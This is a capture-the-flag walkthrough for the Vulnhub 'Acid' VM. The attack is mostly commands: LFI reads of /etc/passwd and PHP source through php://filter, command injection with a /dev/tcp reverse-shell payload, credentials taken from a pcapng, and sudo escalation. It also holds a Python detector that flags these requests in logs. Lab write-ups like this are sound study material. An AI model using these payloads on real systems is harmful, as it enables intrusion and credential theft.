[Vulnhub] Acid: ROT13 + LFI + RCE + pcapng information leak + privilege escalation
Word count: 799, 2025-08-20 18:18:40
Acid VM penetration testing walkthrough
1. Information gathering
1.1 Port scan
Port scan with Nmap:
nmap -p- 192.168.101.157 --min-rate 1000 -sC -sV
Open port found:
- 33447/tcp: Apache httpd 2.4.10 (Ubuntu)
1.2 Directory enumeration
Directory scan with Gobuster:
gobuster dir -u "http://192.168.101.157:33447" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php
Notable directory found:
- /Challenge/
2. Initial access
2.1 Finding acid.txt
Visit:
http://192.168.101.157:33447/Challenge/acid.txt
The file content is ROT13-encoded and reversed:
echo "gkg.qvpn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'|rev
Decoding yields:
- Username: test_user
- Email: test@example.com
- Password: 6ZaxN2Vzm9NUJT2y
3. Local file inclusion (LFI) exploitation
3.1 Reading /etc/passwd via include.php
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=/etc/passwd" | sed '/<!DOCTYPE html>/,$d'
The response is hex-encoded:
0x5933566a4c6e4a34626e413d
Decoding steps (hex, then base64, then ROT13, then reverse):
echo "5933566a4c6e4a34626e413d" | xxd -r -p |base64 -d | tr 'A-Za-z' 'N-ZA-Mn-za-m'|rev
3.2 Reading PHP source
Read the cake.php source with php://filter:
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=cake.php"
Decode:
echo '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'|base64 -d
4. Remote code execution (RCE) exploitation
4.1 Finding Magic_Box/tails.php
curl http://192.168.101.157:33447/Challenge/Magic_Box/tails.php
4.2 Reading validate.php to obtain the key
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=./Magic_Box/proc/validate.php"
After decoding, the key is found:
key:63425
4.3 Executing commands via command.php
curl -X POST -d "IP=;ls&submit=submit" http://192.168.101.157:33447/Challenge/Magic_Box/command.php
4.4 Getting a reverse shell
curl -X POST -d "IP=;/bin/bash -c 'bash%20%3E%26%2Fdev%2Ftcp%2F192.168.101.128%2F10032%200%3E%261'"+"&submit=submit" http://192.168.101.157:33447/Challenge/Magic_Box/command.php
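As a defensive counterpart to sections 3 and 4, here is an added example (not from the original write-up) that flags the include.php and command.php request patterns shown above when they appear in Apache access-log lines. The log lines are constructed, the client addresses are placeholders, and the rules are assumptions about what this application should never receive.

```python
import re
from urllib.parse import unquote, parse_qs

# Constructed Apache access-log lines (not captured from the real box); they
# mirror the include.php and command.php requests used in this walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2025:18:10:01 +0800] "GET /Challenge/include.php?add=Extract+File&file=/etc/passwd HTTP/1.1" 200 512
10.0.0.5 - - [20/Aug/2025:18:10:09 +0800] "GET /Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=cake.php HTTP/1.1" 200 2048
10.0.0.5 - - [20/Aug/2025:18:11:30 +0800] "POST /Challenge/Magic_Box/command.php HTTP/1.1" 200 310
10.0.0.9 - - [20/Aug/2025:18:12:00 +0800] "GET /Challenge/cake.php HTTP/1.1" 200 1200
"""

# Common Log Format: client identd user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+$')

# Parameter values that indicate a file-inclusion attempt: a PHP stream wrapper
# (php://filter is used above to read source), traversal, or an absolute system path.
LFI_VALUE_RE = re.compile(r'(?:^[a-z]+://|\.\./|^/etc/|^/proc/|^/var/log/)', re.I)

# Endpoint the walkthrough shows accepting a shell command in the POST body.
# Request bodies are not in the access log, so every POST to it is worth a look.
RCE_ENDPOINTS = {'/Challenge/Magic_Box/command.php'}

def classify(line):
    """Return (ip, path, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw_path, _, query = m.group('target').partition('?')
    path = unquote(raw_path)
    reasons = []
    # parse_qs percent-decodes values once, so an encoded "php%3A//" is caught too
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if LFI_VALUE_RE.search(value):
                reasons.append(f'lfi param {key}={value[:48]}')
    if m.group('method') == 'POST' and path in RCE_ENDPOINTS:
        reasons.append('POST to command-execution endpoint')
    return (m.group('ip'), path, reasons) if reasons else None

def scan_log(log_text):
    """Run classify() over every line; returns the list of suspicious requests."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == '__main__':
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path, '; '.join(reasons))
```

Against the sample log, three of the four requests are flagged: both include.php reads and the POST to command.php; the plain GET of cake.php is not.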
5. Privilege escalation
5.1 Finding the pcapng file
find / -type f -name '*.pcap*' 2>/dev/null
File found:
/sbin/raw_vs_isi/hint.pcapng
5.2 Transferring the file to the local machine
cp /sbin/raw_vs_isi/hint.pcapng /tmp
python3 -m http.server 9999
Download locally:
wget http://192.168.101.157:9999/hint.pcapng
5.3 Analysing the pcapng file
tshark -r hint.pcapng -qz follow,tcp,ascii,0
Credentials found:
- username: saman
- password: 1337hax0r
5.4 Escalating to root
su saman
sudo /bin/bash
5.5 Getting the flag
cat /root/flag.txt
Flag content:
Acid@Makke@Hax0r
6. Key takeaways
- Information gathering: Nmap scan, directory enumeration
- Encoding analysis: ROT13, hex and base64 encoding
- LFI exploitation: reading /etc/passwd and PHP source files
- RCE exploitation: command injection, reverse shell
- Privilege escalation: extracting credentials from a network capture file, sudo escalation
- Tools used: curl, tshark, Python HTTP server